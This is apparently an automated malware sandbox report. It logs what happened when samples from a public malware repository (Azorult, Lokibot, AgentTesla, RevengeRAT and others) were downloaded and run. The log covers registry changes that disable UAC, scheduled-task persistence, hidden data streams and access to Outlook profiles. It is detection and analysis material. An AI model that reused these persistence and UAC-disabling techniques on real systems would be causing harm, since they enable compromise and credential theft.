description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 6AdwCleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 6AdwCleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c00000001000000040000000008000019000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b0400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 6AdwCleaner.exe -
NTFS ADS 32 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 27773.crdownload:SmartScreen msedge.exe File created C:\Program Files (x86)\Common Files\System\wmsncs.exe\:SmartScreen:$DATA wmsncs.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 744043.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 587678.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 21765.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 815200.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 995056.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 168919.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 333153.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 755000.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 571346.crdownload:SmartScreen msedge.exe File created C:\Users\Admin\AppData\Roaming\svchost.exe\:SmartScreen:$DATA RegSvcs.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 69181.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 114701.crdownload:SmartScreen msedge.exe File created C:\svchost\svchost.exe\:SmartScreen:$DATA RegSvcs.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 308141.crdownload:SmartScreen msedge.exe File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 179696.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 398437.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 33560.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 551223.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 709199.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 109879.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 715112.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 997490.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 451710.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 556463.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 126750.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 417755.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 65090.crdownload:SmartScreen msedge.exe File created C:\Windows\Fonts\wmsncs.exe\:SmartScreen:$DATA Kobalc.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\wmsncs.exe\:SmartScreen:$DATA wmsncs.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3904 NOTEPAD.EXE -
Runs .reg file with regedit 2 IoCs
pid Process 5100 regedit.exe 1144 regedit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3492 schtasks.exe 1916 schtasks.exe 1556 schtasks.exe 1452 schtasks.exe 5692 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3776 explorer.exe 4152 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1180 msedge.exe 1180 msedge.exe 4336 msedge.exe 4336 msedge.exe 968 identity_helper.exe 968 identity_helper.exe 3104 msedge.exe 3104 msedge.exe 2880 msedge.exe 2880 msedge.exe 908 msedge.exe 908 msedge.exe 5108 msedge.exe 5108 msedge.exe 4684 msedge.exe 4684 msedge.exe 5032 msedge.exe 5032 msedge.exe 2896 msedge.exe 2896 msedge.exe 3972 msedge.exe 3972 msedge.exe 2916 msedge.exe 2916 msedge.exe 776 msedge.exe 776 msedge.exe 4504 msedge.exe 4504 msedge.exe 2660 msedge.exe 2660 msedge.exe 2660 msedge.exe 2660 msedge.exe 3164 msedge.exe 3164 msedge.exe 4916 msedge.exe 4916 msedge.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 3004 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 1156 Azorult.exe 4216 rutserv.exe 4216 rutserv.exe 4216 rutserv.exe 4216 rutserv.exe 4216 rutserv.exe 4216 rutserv.exe 772 rutserv.exe 772 rutserv.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 3116 taskhostw.exe 4336 msedge.exe 4772 Sevgi.a.exe 4976 Sevgi.a.exe 3776 explorer.exe 4152 Process not Found -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 640 Process not Found 640 Process not Found 640 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs
pid Process 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe 3048 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1596 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1060 6AdwCleaner.exe Token: SeDebugPrivilege 64 6AdwCleaner.exe Token: SeDebugPrivilege 3420 HawkEye.exe Token: SeDebugPrivilege 4216 rutserv.exe Token: SeDebugPrivilege 1644 rutserv.exe Token: SeTakeOwnershipPrivilege 3852 rutserv.exe Token: SeTcbPrivilege 3852 rutserv.exe Token: SeTcbPrivilege 3852 rutserv.exe Token: SeDebugPrivilege 4832 taskkill.exe Token: SeDebugPrivilege 2260 taskkill.exe Token: SeDebugPrivilege 1156 taskkill.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeAuditPrivilege 2008 svchost.exe Token: SeDebugPrivilege 2380 RDPWInst.exe Token: SeAuditPrivilege 1864 svchost.exe Token: SeDebugPrivilege 5128 taskkill.exe Token: SeDebugPrivilege 5164 taskkill.exe Token: SeDebugPrivilege 1492 Lokibot.exe Token: SeDebugPrivilege 3320 Opaserv.l.exe Token: SeDebugPrivilege 6036 msload.exe Token: SeShutdownPrivilege 6036 msload.exe Token: 33 4340 Kobalc.exe Token: SeIncBasePriorityPrivilege 4340 Kobalc.exe Token: 33 5148 wmsncs.exe Token: SeIncBasePriorityPrivilege 5148 wmsncs.exe Token: SeDebugPrivilege 4936 Lokibot.exe Token: SeDebugPrivilege 3020 RevengeRAT.exe Token: SeDebugPrivilege 1332 RevengeRAT.exe Token: SeDebugPrivilege 2004 RegSvcs.exe Token: SeDebugPrivilege 5724 RegSvcs.exe Token: SeDebugPrivilege 6068 svchost.exe Token: SeDebugPrivilege 4928 RegSvcs.exe Token: SeDebugPrivilege 5864 taskmgr.exe Token: SeSystemProfilePrivilege 5864 taskmgr.exe Token: SeCreateGlobalPrivilege 5864 taskmgr.exe Token: 33 5864 taskmgr.exe Token: SeIncBasePriorityPrivilege 5864 taskmgr.exe Token: SeDebugPrivilege 5056 svchost.exe Token: SeDebugPrivilege 5572 RegSvcs.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe Token: SeCreatePagefilePrivilege 3776 explorer.exe Token: SeShutdownPrivilege 3776 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 2116 ButterflyOnDesktop.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 4336 msedge.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe 5864 taskmgr.exe -
Suspicious use of SetWindowsHookEx 40 IoCs
pid Process 64 6AdwCleaner.exe 64 6AdwCleaner.exe 1060 6AdwCleaner.exe 1060 6AdwCleaner.exe 5104 AgentTesla.exe 4396 AgentTesla.exe 3004 Azorult.exe 1156 Azorult.exe 3176 wini.exe 4204 winit.exe 4216 rutserv.exe 772 rutserv.exe 1644 rutserv.exe 3852 rutserv.exe 2948 cheat.exe 4568 taskhost.exe 4928 P.exe 4152 ink.exe 4640 R8.exe 1232 winlogon.exe 3116 taskhostw.exe 2980 winlogon.exe 4396 Azorult.exe 5200 NETFramework.exe 3948 NETFramework.exe 5980 Setup.exe 3840 StartMenuExperienceHost.exe 3436 SearchApp.exe 3776 explorer.exe 3776 explorer.exe 3776 explorer.exe 1900 Process not Found 3824 Process not Found 6296 Process not Found 4152 Process not Found 4152 Process not Found 4152 Process not Found 3464 Process not Found 4152 Process not Found 4152 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4336 wrote to memory of 3548 4336 msedge.exe 85 PID 4336 wrote to memory of 3548 4336 msedge.exe 85 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1592 4336 msedge.exe 86 PID 4336 wrote to memory of 1180 4336 msedge.exe 87 PID 4336 wrote to memory of 1180 4336 msedge.exe 87 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 PID 4336 wrote to memory of 2720 4336 msedge.exe 88 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 1616 attrib.exe 5196 attrib.exe 2276 attrib.exe 4588 attrib.exe 3416 attrib.exe 4548 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd37d446f8,0x7ffd37d44708,0x7ffd37d447182⤵PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:32⤵
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:82⤵PID:2720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:12⤵PID:3476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:82⤵PID:1884
-
-
